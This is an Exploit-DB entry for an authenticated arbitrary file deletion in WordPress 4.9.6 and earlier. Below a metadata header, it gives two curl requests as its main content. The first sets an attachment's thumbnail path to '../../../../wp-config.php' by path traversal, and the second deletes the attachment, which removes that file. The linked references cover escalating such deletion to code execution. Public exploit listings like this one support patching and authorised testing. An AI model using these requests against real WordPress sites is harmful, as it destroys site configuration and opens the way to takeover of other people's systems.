Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion

EDB-ID: 44949
Author: VulnSpy
Published: 2018-06-27
CVE: N/A
Type: Webapps
Platform: PHP
Aliases: N/A
Tags: N/A
Vulnerable App: N/A 

 # Date: 2018-06-27 
 # Exploit Author: VulnSpy 
 # Vendor Homepage: http://www.wordpress.org 
 # Software Link: http://www.wordpress.org/download 
 # Version: <= 4.9.6 
 # Tested on: php7 mysql5 
 # CVE : 
  
 Step 1: 
  
 ``` 
 curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' 
 ``` 
  
 Step 2: 
  
 ``` 
 curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' 
 ``` 
  
 REF: 
   Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ 
   WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

Source: www.exploit-db.com
Related Posts